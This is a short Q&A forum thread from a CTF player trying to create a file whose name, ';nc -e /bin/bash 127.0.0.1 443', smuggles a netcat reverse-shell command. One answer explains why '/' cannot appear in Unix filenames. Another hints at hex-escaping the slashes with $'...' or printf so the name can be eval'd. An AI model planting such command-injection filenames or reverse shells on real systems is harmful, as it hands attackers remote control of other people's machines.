# Escape '/bin/bash' from filename

Tags: shell, terminal, escape-characters

I am playing in a CTF and I want to create a file with name `;nc -e /bin/bash 127.0.0.1 443` using the command touch and I am failing.

I can create a file named `;nc -e 127.0.0.1 443` without a problem writing something like `touch -- \;nc\ \-e\ 127\.0\.0\.1\ \4\4\3` but I cannot include the `/bin/bash` even if I do something like `touch -- \;nc\ \-e\ \/\b\i\n\/\b\a\s\h\ 127\.0\.0\.1\ \4\4\3` with the response to be `touch: cannot touch ';nc -e /bin/bash 127.0.0.1 443': No such file or directory`

What I am doing wrong?

Answer (score 3):

Filenames on Unix can not contain the character `/` since this is the path separator.

The pathname

```
;nc -e /bin/bash 127.0.0.1 443
```

would refer to a file called `bash 127.0.0.1 443` in the directory `bin`, which in turn is a subdirectory of `;nc -e` (with a space at the end).

The `/` character is one of only two characters that are not allowed in Unix filenames. The other is the nul character (ASCII 0, or `\0`).  The nul character is not allowed in filenames since it's a string terminator.

Also note that it's easier to single quote complex filenames than to escape the needed symbols:

```
touch ';nc -e 127.0.0.1 443'
```

Comment: Oh really? I didn't know that. I was thinking that I am escaping something wrong. Thanks for your reply.

Answer (score 0):

> I want to create a file with name `;nc -e /bin/bash 127.0.0.1 443` using the command touch

Is the idea that the filename is going to be `eval`'d as part of some other script?

In that case, you might want find the `$'...'` form of  quoting or `printf` useful:

```
$ echo $'\x2fbin\x2fbash'
/bin/bash
$ printf "\x2fbin\x2fbash"
/bin/bash
```

I'll leave it as an exercise to figure out how to use those in a filename, for now.